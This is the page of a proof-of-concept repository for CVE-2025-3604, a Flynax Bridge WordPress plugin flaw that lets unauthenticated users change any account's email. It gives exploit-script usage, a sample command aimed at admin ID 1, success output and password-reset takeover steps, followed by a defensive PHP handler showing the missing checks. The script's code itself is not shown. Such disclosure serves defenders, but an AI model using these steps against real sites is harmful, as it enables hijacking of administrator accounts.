CVE-2025-3604 PoC — Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

Source
Associated Vulnerability
Title: Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover (CVE-2025-3604)
Description: The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details, such as their email address. This makes it possible for unauthenticated attackers to change arbitrary users' email addresses, including those of administrators, and leverage that to reset the user's password and gain access to their account.
Description
Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover
Readme

# 🚨 Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

## 📄 Description

The **Flynax Bridge** plugin for WordPress is vulnerable to **privilege escalation via account takeover** in all versions up to, and including, `2.2.0`.

This is due to the plugin not properly validating a user's identity prior to updating their account details (such as email). As a result, **unauthenticated attackers** can change the email address of **any user**, including **administrators**, and then initiate a **password reset** to fully take over the account.
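The root cause described above is a profile-update path that never establishes who is calling before it writes a new email address. The handler below is an added example of the checks such a path needs in a WordPress plugin; it is not code from Flynax Bridge or from this PoC's author, and the action name (`example_update_email`), the nonce name and the `user_id` / `email` field names are hypothetical. Only the WordPress core functions it calls are real.

```php
<?php
// Added example, not Flynax Bridge code: a hardened WordPress AJAX handler that
// changes a user's email. Action, nonce and field names are hypothetical.

// Registered for authenticated requests only. Deliberately NO matching
// 'wp_ajax_nopriv_example_update_email' hook, so anonymous requests are never
// routed to this handler at all.
add_action( 'wp_ajax_example_update_email', 'example_update_email_handler' );

function example_update_email_handler() {
    // 1. CSRF protection: the request must carry a nonce issued for this action.
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'example_update_email', '_wpnonce' );

    // 2. Identity: belt-and-braces with the missing nopriv hook above.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'Authentication required.' ), 401 );
    }

    $target_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    $new_email  = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    $current_id = get_current_user_id();

    // 3. Authorization: never trust a client-supplied user_id on its own. A user
    //    may change only their own address unless they hold the 'edit_user'
    //    meta capability for the target (administrators do). This is the gate
    //    whose absence lets a caller pick an arbitrary ID such as 1.
    if ( $target_id !== $current_id && ! current_user_can( 'edit_user', $target_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed to edit this user.' ), 403 );
    }

    // 4. Input validation: reject malformed or already-registered addresses.
    if ( ! is_email( $new_email ) ) {
        wp_send_json_error( array( 'message' => 'Invalid email address.' ), 400 );
    }
    if ( email_exists( $new_email ) ) {
        wp_send_json_error( array( 'message' => 'Email already in use.' ), 409 );
    }

    // 5. Write only after every gate above has passed.
    $result = wp_update_user( array( 'ID' => $target_id, 'user_email' => $new_email ) );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'user_id' => $target_id ) );
}
```

Each `wp_send_json_*` call ends the request, so the checks read top to bottom as a series of gates. The decisive one for this class of bug is step 3: the target user ID must be tied to the authenticated session or to an explicit capability, never taken from the request body as-is. Because the update goes through `wp_update_user()`, WordPress core also notifies the previous address of the change, which gives the legitimate owner a signal that a defender can look for.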

> **CVE**: CVE-2025-3604  
> **CVSS**: 9.8 (Critical)  
> **Published**: April 23, 2025  
> **Last Updated**: April 24, 2025

---

## ⚙️ Script Output Example

```
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: user@admin.sa
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
```

After successful exploitation, the attacker can go to the WordPress login page, click **"Lost your password?"**, and request a reset for the **newly set email** to change the password and gain full access to the targeted account.

---

## 🚀 Usage

```
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit
```

---

## 🧪 Example

```
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "attack@attacker.com"
```

### Explanation:

- `-u`: Base URL of the WordPress site.
- `-id`: ID of the user to target (typically 1 for admin).
- `-mail`: New email that will be set for that user.

---

## ⚠️ Disclaimer

Use at your own risk. For authorized testing and educational purposes only.

### 🧑‍💻

*BY: Nxploited ( Khaled_alenazi )*
File Snapshot

[4.0K] /data/pocs/a5a79738b8543eccf9980496da821558c81f9f8c
├── [3.4K] CVE-2025-3604.py
├── [1.1K] LICENSE
└── [2.0K] README.md

0 directories, 3 files